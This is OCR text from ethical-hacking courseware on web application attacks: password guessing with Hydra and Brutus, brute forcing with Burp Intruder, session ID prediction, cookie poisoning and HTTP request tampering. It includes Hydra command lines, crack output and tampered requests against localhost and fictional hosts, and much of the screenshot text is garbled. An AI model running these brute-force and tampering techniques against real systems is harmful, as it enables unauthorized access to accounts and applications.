a tte m p ts is n o t lim ite d , a tta ckers can guess th e challenge a nsw er successfully w ith th e help o f
social eng in ee rin g . A p p lica tio n s m ay also send a u niqu e reco very URL o r existin g passw ord to
an em ail address specified by th e a tta c k e r if th e challenge is solved.
R e m e m b e r M e E x p l o i t
R em em ber M e fu n c tio n s are im p le m e n te d using a sim ple p e rs is te n t cookie, such as
R em em berU ser=jason o r a p e rsiste n t session id e n tifie r such as R em em berU ser=A B Y 112010.

A tta cke rs can use an e n u m e ra te d user nam e o r p re d ic t th e session id e n tifie r to bypass
a u th e n tic a tio n m echanism s.

CEHPassword Attacks: Password
Guessing
Tools
Password guessing can be
pe rfo rm e d m anually o r using
a u to m a te d to o ls such as B rutus,
TH C -H ydra,etc.
Password
DictionaryreA ttackers can create a d ictio n a ry
o f all possible passw ords using
to o ls such as D ictio n a ry M a k e r
to p e rfo rm d ictio n a ry attacks
Password
List
Attackers create a list o f possible
passwords using m ost com m only
used passwords, footp rinting target
and social engineeringtechniques,
and try each password until the
correct password is discovered
*lout
Ta1g«l Passw crts |Tun.ng |0p ecific Gtart |
O utojt
H ydra v4 * (c) 5004 by van M au ser/T H C • u se allo‫׳‬A/Pd only for legal purposes
H yd‫׳‬a (tvto . •vw.ua Ihc erg) starling at 2004-05-17 51:58:52
[DA ' AJ 32 ta sk s. 1 servers, 45380 login tries (l:1/p:45380). ~1418 tries p e rta sk
[ d a t a ] a ra c k n g service ftp on port 21
(STATUS]14055.00Ules/min.14050IrlesIn00:01h.31324lexfoIn00:031)
[STATUS]14513.00ifles/min.29020triesIn00:0211.15354tcxioIn00.0211
[2 ‫ו‬ ][Tip] h o st: 127.0.0.1 login: m a rc p a ssw o rd : s u c c e s s
Hyda(Mp.//*#swlhcerg)finisheda!2004-05-1722:01:38
<r1nlshed>
Gave Output I
% !0 u it
Target Pa3swcrdc |Tuning | Cpeciffc | Gtart j
Username
(• Username test!
C Usomamo Lict
C Password
<* Passv/ora List
[7 Try empty passwac;
C olor separated rile
r Leo Colon 6eporatod filo
P" Try login a s passw ord
hydra 127.0.0.1 ftp -I testuser -P /tmp/pa3slist.1xt -e ns
- ■ P a s s w o r d A t t a c k s : P a s s w o r d G u e s s i n g
J 1 = S
- Password guessing is a m e th o d w h e re an a tta c k e r guesses va riou s passw ords u n til he
o r she gets th e c o rre c t passw ords by using th e fo llo w in g m eth od s: passw ord list, passw ord
d ic tio n a ry , and va riou s to ols.
A ttacke rs crea te a list o f possible passw ords using m ost c o m m o n ly used passw ords,
fo o tp rin tin g ta rg e t and social e n g in e e rin g te ch n iq u e s, and try in g each passw ord u n til th e
c o rre c t passw ord is discovered.
P a s s w o r d D i c t i o n a r y
A ttacke rs can crea te a d ic tio n a ry o f all possible passw ords using to o ls such as
D ictio n a ry M a ke r to p e rfo rm d ic tio n a ry attacks.
T o o l s U s e d f o r P a s s w o r d G u e s s i n g
Password guessing can be p e rfo rm e d m an ua lly o r using a u to m a te d to o ls such as
m
W ebC racker, B rutus, Burp Insider, THC-H ydra, etc.
T H C - H y d r a
Source: h ttp ://w w w .th c .o rg

THC-HYDRA is a n e tw o rk logon cracker th a t su p p o rts m any d iffe re n t services. This to o l is a
p ro o f o f co n ce p t code, to give researchers and se cu rity co n su lta n ts th e p o ssib ility to sh ow h o w
easy it w o u ld be to gain u n a u th o rize d re m o te access to a system .
I I I III 1 1
<0Q u it
‫•י‬ H y d ra G T K [h IfIh !
T a rg e t P a ssw o rd s | T u n in g | S p e c ific | S tart | T a rg e t | P a ssw o rd s | T u n in g |S p e c ific S ta rt ‫ן‬
U serna m e O u tpu t
(• U se rn a m e |te s tu s e t
C U se rn a m e L is t
H ydra v 4 1 (c) 20 0 4 by va n H a u se r / T H C ‫־‬ u s e allo w e d on ly fo r legal purpo ses.
H ydra ( h tt p /.w w w .th c org) s ta rtin g at 2004-05*17 21 ;5 8:5 2
[D A T A ] 3 2 ta s k s . 1 s e rve rs. 45 38 0 login trie s (l:1 /p :4 5 3 8 0 ). ~ 1 4 1 8 trie s p e r ta s k
[D A T A ] a tta c k in g s e rv ic e ftp on port 21
[S T A T U S ] 14 05 6.00 tn e s 'm in , 14 05 6 trie s in 0 0 :0 1h . 31 32 4 to d o in 00:0 3h
[S T A T U S ] 14 51 3.00 tn e s^m in . 2 9 0 2 6 trie s in 0 0 :0 2h . 16354 to d o in 00:0 2h
[21 ][T ip ] h o s t: 12 7.0.0 .1 lo g in : m a rc p a s s w o rd : s u c c e s s
H ydra (h ltp /.,w w w .th c org) fin is h e d at 2 0 04 -05 -1 7 2 2 :0 1.3 8
< fln is h e d >
p a s sw ora
C P a ssw o rd
<• P a ssw o rd L is t |/tm p /p a s s lis t.tx t
C d o n se p e ra te d file
U s e C olo n sep e ra te d file
(7 T ry log in a s p a ssw o rd F T ry e m p ty pa ssw o rd
S fa r lj S to p j r.oveO u tp u t | C le a r O u tp u t |
fiy d r a 127.0.0.1 ftp •1 te s tu s e r •P /tm p /p a s s lis t.tx t ■e ns ^ 1yd ra 127.0 0.1 ftp 1‫־‬ m arc -P /tm p /p a s s lis t.tx t ■e ns -t 32
F I G U R E 1 3 . 4 1 : T H C - H y d r a T o o l S c r e e n s h o t
In a d d itio n to th ese to o ls, Burp Insider is also used fo r passw ord guessing.

Password Attacks: Brute-forcing I CEH
C o p y rig h t © by E&Cauactl. A ll R ig h ts R e s e rv e d . R e p ro d u c tio n is S tr ic tly P ro h ib ite d .
P a s s w o r d A t t a c k s : B r u t e F o r c i n g
wcav 1 1 B ru te fo r c e is o n e o f th e m e th o d s used fo r c ra c k in g p a s s w o rd s . In a b ru te fo rc in g
a tta c k , a tta c k e rs cra c k th e lo gin p a s s w o rd s by tr y in g all p o ss ib le v a lu e s f r o m a s e t o f a lp h a b e t,
n u m e ric , a n d special c h a ra c te rs . T h e m a in lim it a t io n o f th e b r u t e fo r c e a tta c k is th is is
b e n e fic ia l in id e n tify in g sm a ll p a s s w o rd s o f t w o c h a ra c te rs . G u e ssin g b e c o m e s m o r e cru cia l
w h e n th e p a s s w o rd le n g th is lo n g e r a n d also if it c o n ta in s le tte rs w it h b o th u p p e r a nd lo w e r
case. If n u m b e r s a n d s y m b o ls a re used, th e n it m ig h t e v e n ta k e m o r e th a n a fe w y e a rs to guess
th e p a s s w o rd , w h ic h is a lm o s t p ra c tic a lly im p o s s ib le . C o m m o n ly used p a s s w o rd c ra c k in g to o ls
b y a tta c k e rs in c lu d e B u rp S u ite's In tru d e r, B ru tu s, S e n se p o s t's C ro w b a r, etc.
B u r p S u i t e 's I n t r u d e r
• > S o u rce: h t t p : / / p o r t s w ig g e r . n e t
B u rp In tr u d e r is a m o d u le o f B u rp S u ite . It e n a b le s th e us e r t o a u to m a tiz e p e n te s tin g o n w e b
a p p lic a tio n s .

s c a n n e r
target positions j payloads ' options______________________________________
numDer of payloads: 1.679 616
number of requests 8.398 080
payload set |1 ▼ | brute forcer __________________ ▼
character set |[at)Cdefghijklmnopqtstuvwxy20123456789 j
intruder repeater [ sequencer f decoder [ comparer ' options alerts
spider
b u rp su ite fre e e d itio n v1.4.01
ourp intruder repeater window about
max length
p a y lo a d p r o c e s s in g r u le s
to uppercase
F I G U R E 1 3 . 4 2 : B u r p S u i t e ' s I n t r u d e r T o o l S c r e e n s h o t
B r u t u s
S o u rce: h t t p : / / w w w . h o o b i e . n e t
B ru tu s is a re m o te p a s s w o rd c ra c k in g to o l. B ru tu s s u p p o rts HTTP, POP3, FTP, S M B , T e ln e t,
IM A P , NNTP, a n d m a n y o th e r a u th e n tic a tio n ty p e s . It in c lu d e s a m u lti-s ta g e a u th e n tic a tio n
e n g in e a n d can m a k e 60 s im u lta n e o u s ta r g e t c o n n e c tio n s .
<‫־‬B r u t u s - A E T 2 - w w w . h o o b i e . n e t / b r u t u s - ( J a n u a r y 2 0 0 0 )
F ile T o o ls H e lp
Tjpe |HTTP (Basic Auth) J | Start | Slep | Cleat |Targe( |127 0 01
10 Timeout r J 10 I- Use Proxy Deline |
Connection Options
ConnectionsPott
HTTP (Basic) Options
Method |HEAD ^ P KeepAive
Biowse
Pass Mode |wotd List
Pass Fie | w 1ds.txtBrowse
Authentication Options
|7 Use Username f~ Single Use!
Usei File |users,txlj
Positive Authentication Results
PasswordUsernameTarget
academicHTTP (Basic Auth) admin
HTTP (Basic Auth) backup
H T T P IR n s ir A ijlh l arlm in
127.0.0.1/
127.0.0.V
1?7nn v
Opened user fie containing 6 users.
Opened password lile containing 818 Passwords
Maximum nurnhpr nf flulhenlicrtfinn alfpmnts wil he 4908
Timeout Reject Auth Sea Throttle Quick Kill
FIGURE 1 3 .4 3 : B ru tu s T ool S c re e n s h o t

C o p y rig h t © b y EC-Couactl. A ll R ig h ts R e s e rv e d . R e p ro d u c tio n is S tr ic tly P ro h ib ite d .
S e s s i o n A t t a c k s : S e s s i o n I D P r e d i c t i o n / B r u t e F o r c i n g
Every tim e a user logs in to a p a rtic u la r w e b site , th e n a session ID is given to th e user.
This session ID is valid u n til th e session is te rm in a te d and a n ew session ID is p ro vid e d w he n th e
user logs in again. A ttacke rs try to e x p lo it th is session ID m e ch a n ism by guessing th e n ext
session ID a fte r co lle ctin g som e valid session IDs.
0 In th e firs t step, th e a tta c k e r collects som e valid session ID values by s n iffin g tra ffic fro m
a u th e n tic a te d users.
© A tta cke rs th e n analyze ca p tu re d session IDs to d e te rm in e th e session ID g e n e ra tio n
process such as th e s tru c tu re o f session ID, th e in fo rm a tio n th a t is used to create it, and
th e e n c ry p tio n o r hash a lg o rith m used by th e a p p lica tio n to p ro te c t it.
© In a d d itio n , th e a tta c k e r can im p le m e n t a b ru te fo rc e te c h n iq u e to g e n e ra te and te s t
d iffe re n t values o f th e session ID u n til he o r she successfully gets access to th e
a p p lica tio n .

© V u ln e ra b le session g e n e ra tio n m echanism s th a t use session IDs com posed by user nam e
o r o th e r p re d icta b le in fo rm a tio n , like tim e s ta m p o r c lie n t IP address, can be e x p lo ite d
by easily guessing valid session IDs.
GET http://lanalna:8180/WebGoat/attack?Ser«en-17& menu=410HTTP/1.1
H o st:ja n a in a :8 1 8 0
U ser*A gent: M o zilla/5 .0 (W indow ; U; W indow s NT 5 .2 ; en*U S ;rv:1.8.1.4) G ec k o /2 0 0 7 0 5 1 5 F irefo x /2 .0.04
R e q u e s t A c c e p t:te x t/x m l,a p p llc a tlo n /x m l,a p p llc a tlo n /x h tm k * m l,te x t/h tm d ;q -0 .9 ,te x t/p la in ;q = 0 .8 ,lm a g e /p n g ,V ,'’,q= 0.5
R e ferer: h ttp ://la n a in a : 8 1 8 0 /W eb G o a t/attac k ?S cre en = 1 7 & m en u = 4 1 0
C ookie; JSESSIONID=user01 ‫♦י‬ .................................................................................
A u th o rizatio n : Basic23V ic3Q 623V lc3Q
F I G U R E 1 3 . 4 4 : S e s s i o n I D P r e d i c t i o n / B r u t e F o r c i n g
For ce rta in w e b a p p lica tio n s, th e session ID in fo rm a tio n is usually com posed o f a s trin g o f fixed
w id th . R andom ness is essential in o rd e r to avoid p re d ic tio n . From th e diagram you can see th a t
th e session ID va riab le is in d ica te d by JSESSIONID and assum ing its value as "u s e rO l," w hich
co rresp on ds to th e user nam e. By guessing th e n ew value fo r it, say as "u se r 0 2 ," it is possible
fo r th e a tta c k e r to gain u n a u th o riz e d access to th e a p p lica tio n .
PredictableSessionCookie

Cookie Exploitation: Cookie
Poisoning
I f th e co o k ie co n ta in s p a s s w o rd s o r s e ssio n id e n tifie rs , a tta cke rs can steal th e c o o kie using
te c h n iq u e s such as s c rip t in je c tio n a nd e a v e s d ro p p in g
A tta c k e rs th e n re p la y th e co o k ie w ith th e sam e o r a lte re d p a s s w o rd s o r session id e n tifie rs to
bypass w e b a p p lic a tio n a u th e n tic a tio n
A tta c k e rs can tra p co o kie s using to o ls such as O W ASP Zed A tta c k P roxy, B u rp S u ite , etc.
Untifled Session - OWASP ZAP
£ile Edit View Analyse Report Tools Hole
dFj® ‫״‬©13‫־‬ Q1? 1, <2>
| Requestsj Response— Brga«.Xj
J M J U jU B i H i - * " 1*1C'■—
1:19—it_‫ו‬‫ו‬:.
_
*_____itt M cxilW S.C ISiadc‫*.י‬ t t €.2; EHK«4t Appl«VebKit/537.4 (KETKL
I lk • Scckol Cfcr0K*/2 2 .0 . 122».94 S«C«X1/537.4
Cache-Conti0 1: oax-aoe=0
Accept! • /•
Rererer: ntcr://in.yonoc.oca»/?p^;3
A eeept-E nccding: adeft
A ccept-L an^uiqv: cn-U S,«n;q^>.9
A ccvpt-C hasavt: XSO-S559-1.at£-S;<f-C. 7 , •jq -0 .3
C ookl•: a<Uld015S24S9e12Sar4e: «<ur-:3S4«U ~C m 3:
Hoats ti.a d ls ie z a x .c o a
Alerts^History Seatdi
.*ran > j spioer j*f[ arueKxe!‫.־‬1
CurrentScans 0
URI found during aa*M
URi found buioul ofaartscope
https://w w w .ow asp.org cunwscaM_* 0 * 0 0 woAlerts r»00 •‫־-״‬ p o f»0
C o p y rig h t © b y EC-Gauactl. A ll R ig h ts R e s e rv e d . R e p ro d u c tio n Is S tr ic tly P ro h ib ite d
C o o k i e E x p l o i t a t i o n : C o o k i e P o i s o n i n g
C ookies fre q u e n tly tra n s m it sensitive cre d e n tia ls and can be m o d ifie d w ith ease to
escalate access o r assum e th e id e n tity o f a n o th e r user.
C ookies are used to m a in ta in a session sta te in th e o th e rw is e stateless HTTP p ro to c o l. Sessions
are in te n d e d to be u n iq u e ly tie d to th e in d ivid u a l accessing th e w e b a p p lic a tio n . Poisoning o f
cookies and session in fo rm a tio n can a llo w an a tta c k e r to in je c t m a lic io u s c o n te n t o r o th e rw is e
m o d ify th e user's o n lin e e xperience and o b ta in u n a u th o rize d in fo rm a tio n .
C ookies can co n ta in session-specific data such as user IDs, passw ords, a cco u n t n um be rs, links
to sh op ping ca rt co n te n ts, su pp lie d p riva te in fo rm a tio n , and session IDs. C ookies exist as files
sto re d in th e c lie n t c o m p u te r's m e m o ry o r hard disk. By m o d ify in g th e data in th e cookie, an
a tta c k e r can o fte n gain escalated access o r m a licio u sly a ffe c t th e user's session. M a n y sites
o ffe r th e a b ility to "R e m e m b e r m e?" and sto re th e user's in fo rm a tio n in a cookie, so he o r she
does n o t have to re -e n te r th e data w ith e very v is it to th e site. A ny p riva te in fo rm a tio n e n te re d
is sto re d in a cookie. In an a tte m p t to p ro te c t cookies, site deve lo pe rs o fte n encode th e
cookies. Easily reve rsib le e nco ding m e th o d s such as Base64 and ROT13 (ro ta tin g th e le tte rs o f
th e a lp h a b e t 13 characters) give m any w h o v ie w cookies a false sense o f se curity. If th e cookie
co n ta in s passw ords o r session id e n tifie rs , a tta ckers can steal th e cookie using te ch n iq u e s such
as sc rip t in je c tio n and e avesdropping. A tta cke rs th e n rep la y th e cookie w ith th e sam e o r a lte re d

passw ords o r session id e n tifie rs to bypass w e b a p p lica tio n a u th e n tic a tio n . Exam ples o f to o ls
used by th e a tta c k e r fo r tra p p in g cookies inclu de OW ASP Zed A tta c k P roxy, B urp S uite, etc.
[® [‫י‬ O W ASP Zed A tta c k P roxy
Source: h ttp s ://w w w .o w a s p .o rg
OW ASP Zed A tta c k P roxy P ro je c t (ZAP) is an in te g ra te d p e n e tra tio n te s tin g to o l fo r te s tin g w eb
a pp lica tion s. It provides a u to m a te d scanners as w e ll as a set o f to o ls th a t a llo w you to fin d
se cu rity v u ln e ra b ilitie s m anually.
O U n t i t l e d S e s s io n - O W A S P Z A P _ 1 _ 1 ‫ם‬ x 1
| £ ile E d it v ie w A n a lyse R e p o rt T o o ls H e lp
1 1 J t d H r i s s i O Q v Q v -*0 ‫׳‬b 0
f S ite s (* ! | f R e q u e s t1- * j R e s p o n s e ••“ j B re a k >C ]
» f=■ http //tr a d in te
H e a d e r: Text * j Body: Text T
» y tr
► U y a h o o _
U s e r - A g e n t : M o z i l l a / 5 . 0 ( W in d o w s N T 6 . 2 ; W OW 64) A p p l e W e b K i t / 5 3 7 . 4 (K H T M L , 4
l l l c e G e c k o ) C h r o m e / 2 2 . 0 . 1 2 2 9 . 9 4 S a f a r l / S 3 7 . 4 ►
C a c h e - C o n t r o l : m a x - a g e _ 0 k
A c c e p t : * / *
R e f e r e r : h t t p : / / i n . y a h o o . c o m / ? p “ u s
A c c e p t - E n c o d i n g : s d c h
A c c e p t - L a n g u a g e : e n - O S , e n ; q “ 0 .8
A c c e p t - C h a r s e t : 1 s 0 - 8 8 s 9 ‫־‬ l , u t f - 8 ; q - 0 . 7 , * ; q - 0 . 3 * ‫׳‬
C o o k i e : a d x i d - 0 1 5 8 2 4 5 0 6 1 2 S a f 4 6 ; a d x f - 1 0 8 4 6 6 6 7 e 1 6 6 3 2
H o s t : t r . a d i n t e r a x . c o m *
H is to r y “ | S e a rch | B re a k P o in ts A le rts
A ctive S ca n J ^ S p i d e r ^ : J B rute F o rc e - [ P o rt S ca n ] F uzze r £ ] P a ra m s [ 3 J O u tpu t
Site: tr a d in te ra x c o m :8 0 T | [> I I ■ C u rre n t S c a n s :0 ■£?
U R I fo u n d d u rin g craw l:
U R I fo u n d b u t o u t o f c ra w l sco p e :
A le rts 1 ^ 0 0 C u rre n t S c a n s 0 0 0
F i g u r e 1 3 . 4 5 : O W A S P Z e d A t t a c k P r o x y T o o l S c r e e n s h o t

Mechanism
Attack Attack
Mechanism
C o p y rig h t © b y EC-Cauactl. A ll R ig h ts R e s e rv e d . R e p ro d u c tio n is S tr ic tly P ro h ib ite d .
‫י‬1‫-־‬ — A u th o riz a tio n p ro te c ts th e w e b a p p lica tio n s by giving a u th o rity to ce rta in users fo r
accessing th e a p p lica tio n s and re s tric tin g ce rta in users fro m accessing such a pp lica tion s.
A tta cke rs by m eans o f a u th o riz a tio n a ttacks try to gain access to th e in fo rm a tio n resources
w ith o u t p ro p e r cred en tials. The w ays to a tta c k a u th o riz a tio n schem es are explained on th e
fo llo w in g slides.

AuthorizationAttack CEHC«rt1fW4 itfciul Nm Im
■ A tta cke rs m a n ip u la te th e HTTP re q u e s ts to s u b v e rt th e a p p lic a tio n a u th o riz a tio n schem es b y m o d ify in g in p u t
fie ld s th a t re la te to use r ID, use r n am e, access g ro u p , co st, file n a m e s, file id e n tifie rs , etc.
^ A tta cke rs fir s t access w e b a p p lic a tio n using lo w p rivile g e d a c c o u n t a nd th e n escalate p rivile g e s to access
p ro te c te d re s o u rc e s
Q u e r y S t r i n g H i d d e n T a g s
A u t h o r i z a t i o n A t t a c k
In an a u th o riz a tio n atta ck, th e a tta c k e r firs t fin d s th e lo w e st p rivile g ed a cco u n t and
th e n logs in as an a u th e n tic user and slo w ly escalates privileges to access p ro te c te d resources.
A tta cke rs m a n ip u la te th e HTTP requests to su b ve rt th e a p p lic a tio n a u th o riz a tio n schem es by
m o d ify in g in p u t fie ld s th a t re la te to user ID, user nam e, access gro up , cost, filen am e s, file
id e n tifie rs , etc.
The sources th a t are used by th e a tta ckers in o rd e r to p e rfo rm a u th o riz a tio n a ttacks include
u n ifo rm resource id e n tifie r, p a ra m e te r ta m p e rin g , POST data, HTTP headers, q u e ry string,
cookies, and h idden tags.
P a r a m e t e r T a m p e r i n g
P a ram ete r ta m p e rin g is an a tta ck th a t is based on th e m a n ip u la tio n o f p aram eters
th a t are exchanged b e tw e e n server and c lie n t in o rd e r to m o d ify th e a p p lica tio n data,
such as price and q u a n tity o f p ro du cts, perm issions and user cred en tials, etc. This in fo rm a tio n
is usually sto re d in cookies, URL q u e ry strings, o r h idden fo rm fie ld s, and th a t is used to
increase in c o n tro l and a p p lica tio n fu n c tio n a lity .
l E P P o s t D a t a
Post data o fte n is co m p rise d o f a u th o riz a tio n and session in fo rm a tio n , since in m ost
o f th e a p p lica tio n s, th e in fo rm a tio n th a t is p ro vid e d by th e c lie n t m u st be associated

w ith th e session th a t had p ro vid e d it. The a tta c k e r e x p lo itin g v u ln e ra b ilitie s in th e post data can
easily m a n ip u la te th e post data and th e in fo rm a tio n in it.

H T T P R eq u est T a m p e rin g CEH
Q uery S tring Tam pering
J I f th e q u e ry s trin g is v is ib le in th e a d d re ss b a r o n th e b ro w s e r, th e a tta c k e r can easily ch a n g e th e
s trin g p a ra m e te r to bypass a u th o riz a tio n m e ch a n ism s
h t t p : / / w w w . j u g g y b o y . c o m / m a i l . a s p x ? m a i l b o x = j o h n & c o m p a n y = a c m e % 2 0 c o n 1
h t t p s : / / j u g g y s h o p . c o m / b o o k s / d o w n l o a d / 8 5 2 7 4 1 3 6 9 . p d f
h t t p s : / / j u g g y b a n k . c o m / l o g i n / h o m e . j s p ? a d m i n = t r u e
J A tta c k e rs can use w e b s p id e rin g to o ls such as B u rp S u ite to scan th e w e b a pp fo r POST p a ra m e te rs
HTTP H eaders
J I f th e a p p lic a tio n uses th e R e fe re r h e a d e r fo r m a kin g access c o n tro l de cisio n s, atta cke rs can m o d ify it
to access p ro te c te d a p p lic a tio n fu n c tio n a litie s
GEThttp://juggyboy:8180/Applications/Download?ItemID =»201 HTTP/1.1
Host: janaina:8180
User-Agent: Mozilla/5.0 (Window; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.04
Accept: text/xml, application/xml, application/xhtml+xml,text/htmtl;g-0.9,text/plain;g=0.8,image/png,*/*‫׳‬g=0.5
Proxy-Connection: keep-alive
Referer: http:// juggyboy:8180/Applications/Download?Admin = False
ltem lD = 201 is not accessible as A dm in param eter is set to false, attacker can change it to tru e and access protected item s
C o p y rig h t © by EC-Cauactl. A ll R ig h ts R e s e rv e d . R e p ro d u c tio n is S tr ic tly P ro h ib ite d .
H T T P R e q u e s t T a m p e r i n g
A ttacke rs ta m p e r w ith th e HTTP re q u e st w ith o u t using a n o th e r user's ID. The a tta c k e r
changes th e re q u e st in b e tw e e n b e fo re th e m essage is received by th e in te n d e d receiver.
Q u e r y S t r i n g T a m p e r i n g
An a tta c k e r ta m p e rs w ith th e q u e ry s trin g w he n th e w e b a p p lica tio n s use q ue ry
strings to pass on th e m essages b e tw e e n pages. If th e q u e ry s trin g is visible in th e
address bar on th e b ro w se r, th e a tta c k e r can easily change th e strin g p a ra m e te r to bypass
a u th o riz a tio n m echanism s.
F I G U R E 1 3 . 4 6 : Q u e r y S t r i n g T a m p e r i n g
A tta cke rs can use w e b sp id ering to o ls such as Burp Suite to scan th e w e b app fo r POST
param eters.
H T T P H e a d e r s
If th e a p p lica tio n uses th e R eferre r h eader fo r m aking access c o n tro l decisions,

a tta ckers can m o d ify it to access p ro te c te d a p p lic a tio n fu n c tio n a litie s .
GET http://juggyboy:8180/Applications/Download?ItemID = 201 HTTP/1.1
Host: janaina:8180
U3er‫־‬Agent: Mozilla/5.0 (Window; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.04
Accept: text/xml, application/xml, application/xhtml+xml,tsxt/htmtl;q-0.9,text/plain;q=0.8,image/png,* /* ,q=0.5
Proxy-Connection: keep-alive
Referer: http://juggyboy:8180/Applications/Download?Admin = False
F I G U R E 1 3 . 4 7 : H T T P H e a d e r s
Item ID = 201 is n o t accessible as th e A d m in p a ra m e te r is set to false; th e a tta c k e r can change it
to tru e and access p ro te c te d item s.

In th e fir s t ste p , th e a tta cke r co lle cts so m e co o kie s s e t b y th e w e b a p p lic a tio n a nd analyzes
th e m to d e te rm in e th e c o o k ie g e n e ra tio n m e c h a n is m
T he a tta c k e r th e n tra p s cookies s e t b y th e w e b a p p lic a tio n , ta m p e rs w ith its p a ra m e te rs
u sin g to o ls , su ch as O W A SP Z ed A tta c k P r o x y , a nd re p la y to th e a p p lic a tio n
I
https://w w w .ow asp.org
C o p y rig h t © b y EC-Gauactl. A ll R ig h ts R e s e rv e d . R e p ro d u c tio n is S tr ic tly P ro h ib ite d .
i ‫ן‬ A u t h o r i z a t i o n A t t a c k : C o o k i e P a r a m e t e r T a m p e r i n g
y . / . C ookie p a ra m e te r ta m p e rin g is a m e th o d used to ta m p e r w ith th e cookies set by th e
w e b a p p lic a tio n in o rd e r to p e rfo rm m alicious attacks.
© In th e firs t step, th e a tta c k e r collects som e cookies set by th e w e b a p p lic a tio n and
analyzes th e m to d e te rm in e th e co o kie g e n e ra tio n m ech an ism .
© The a tta c k e r th e n trap s cookies set by th e w e b a p p lica tio n , ta m p e rs w ith its p a ra m e te rs
using to o ls such as Paros Proxy, and replays to th e a p p lica tio n .
Source: h ttp s ://w w w .o w a s p .o rg

Mechanism
Attack Attack
Mechanism
A t t a c k S e s s i o n M a n a g e m e n t M e c h a n i s m
The session m an a g e m e n t m echanism is th e key se cu rity c o m p o n e n t in m o st w e b a pp lica tion s.
Since it plays a key role, it has becom e a p rim e ta rg e t fo r lau nch ing m alicious a ttacks against
a p p lica tio n session m a n ag em en t. An a tta c k e r b reaking th e a p p lica tio n session m an a g e m e n t
can easily bypass th e ro b u s t a u th e n tic a tio n c o n tro ls and m asquerade as a n o th e r a p p lica tio n
user w ith o u t k n o w in g th e ir cre d e n tia ls (user nam e, passw ords). The a tta c k e r can even ta ke th e
e n tire a p p lica tio n u n d e r his o r h er c o n tro l if he o r she co m p ro m ise s an a d m in is tra tiv e user in
th is w ay. The d eta ils a b o u t th e a tta ck session m a n a g e m e n t m echanism are described in d e ta il
on th e fo llo w in g slides.

Session M a n a g e m e n t A tta c k
S e s s i o n M a n a g e m e n t A t t a c k
A session m a n a g e m e n t a tta ck is one o f th e m e th o d s used by a tta ckers to co m p ro m ise
a n e tw o rk . A ttacke rs break an a p p lic a tio n 's session m a n a g e m e n t m echanism to bypass th e
a u th e n tic a tio n co n tro ls and im p e rso n a te a p rivile g ed a p p lica tio n user. A session m an a g e m e n t
a tta ck involves tw o stages; one is session to k e n g e n e ra tio n and th e o th e r is e x p lo itin g session
to ke n s handling.
In o rd e r to g en erate a valid session to k e n , th e a tta c k e r p e rfo rm s:
0 Session Tokens P re diction
© Session Tokens T am p erin g
Once th e a tta c k e r g en erates th e valid session to k e n , th e a tta c k e r trie s to e x p lo it th e session
to k e n h an dling in th e fo llo w in g w ays:
0 Session H ijacking
© Session Replay
Q M a n -ln -T h e -M id d le A tta ck

EH
Attacking Session Token
Generation Mechanism
W e a k E n c o d in g E x a m p le
h t t p s : / / w w w . j u g g y b o y . c o m / c h e c k o u t ?
S e s s i o n T o k e n = % 7 5 % 7 3 % 6 5 % 7 2 % 3 D % 6 A % 6 1 % 7 3 % 6 F % 6 E % 3 B % 6 1 % 7 0 % 7 0 % 3 D % 6 1 % 6 4 % 6 D % 6 9 % 6 E % 3 B % 6
4 % 6 1 % 7 4 % 6 5 % 3 D % 3 2 % 3 3 % 2 F % 3 1 % 3 1 % 2 F % 3 2 % 3 0 % 3 1 % 3 0
user=jason;app=admin;date=23/ll/201W h e n h e x-e n co d in g o f an ASCII s trin g
session to k e n by ju s t cha n g in g d a te and use it fo r a n o th e r tra n s a c tio n w ith se rve r
S e s s io n T o k e n P r e d i c t i o n
A t t a c k e r s o b t a i n v a l i d s e s s i o n t o k e n s b y s n i f f i n g t h e t r a f f i c o r l e g i t i m a t e l y l o g g i n g i n t o a p p l i c a t i o n a n d
a n a l y z i n g i t f o r e n c o d i n g ( h e x - e n c o d i n g , B a s e 6 4 ) o r a n y p a t t e r n
I f a n y m e a n i n g c a n b e r e v e r s e e n g i n e e r e d f r o m t h e s a m p l e o f s e s s i o n t o k e n s , a t t a c k e r s a t t e m p t t o
g u e s s t h e t o k e n s r e c e n t l y i s s u e d t o o t h e r a p p l i c a t i o n u s e r s
A t t a c k e r s t h e n m a k e a l a r g e n u m b e r o f r e q u e s t s w i t h t h e p r e d i c t e d t o k e n s t o a s e s s i o n - d e p e n d e n t
p a g e t o d e t e r m i n e a v a l i d s e s s i o n t o k e n
C o p y rig h t © b y E&CsiMCtl.A ll R ig h ts R e s e rv e d . R e p ro d u c tio n is S tr ic tly P ro h ib ite d .
A t t a c k i n g S e s s i o n T o k e n G e n e r a t i o n M e c h a n i s m
A ttacke rs steal valid session to ke n s and th e n p re d ic t th e n ext session to k e n a fte r
o b ta in in g th e va lid session tokens.
W e a k E n c o d i n g E x a m p l e
h t t p s : //w w w .ju g g y b o y . c o m /c h e c k o u t?
G
SessionToken=%75%73%65%72%3D%6A%61%73%6F%6E%3B%61%70%70%3D%61%64%6D%69%6E%3B%
64%61%74%65%3D%32%33%2F%31%31%2F%32%30%31%30
W hen hex-encoding o f an ASCII s trin g u s e r = ja s o n ;a p p = a d m in ;d a te = 2 3 /ll/2 0 l0 , th e a tta c k e r
can p re d ic t a n o th e r session to ke n by ju s t changing th e date and using it fo r a n o th e r tra n sa ctio n
w ith th e server.
S e s s i o n T o k e n P r e d i c t i o n
A ttacke rs o b ta in valid session to ke n s by s n iffin g th e tra ffic o r le g itim a te ly logging in to
a p p lica tio n and analyzing it fo r e nco ding (hex-encoding, Base64) o r any p a tte rn . If any m eaning
can be reverse eng in ee red fro m th e sam ple o f session to ken s, a tta ckers a tte m p t to guess th e

to ke n s re c e n tly issued to o th e r a p p lic a tio n users. A tta cke rs th e n m ake a large n u m b e r o f
requests w ith th e p re d icte d to ken s to a se ss io n -d e p e n d e n t page to d e te rm in e a v a lid session.

A t t a c k i n g S e s s i o n T o k e n s H a n d l i n g r c u
M e c h a n i s m : S e s s i o n T o k e n S n i f f i n g J L ^ !7
■ A ttackers sn iff th e a p p lica tio n tra ffic using a sn iffin g to o l such as W ireshark o r an in te rce p tin g proxy such as B urp. If
HTTP cookies are being used as th e transm ission m echanism fo r session tokens and th e secure fla g is n o t set, attackers
can repla y th e c o o kie to gain unauthorized access to a p p lica tion
■ A tta cke r can use session cookies to p e rfo rm session hijacking, session replay, and M a n -in -th e -M id d le attacks
A t t a c k i n g S e s s i o n T o k e n s H a n d l i n g M e c h a n i s m :
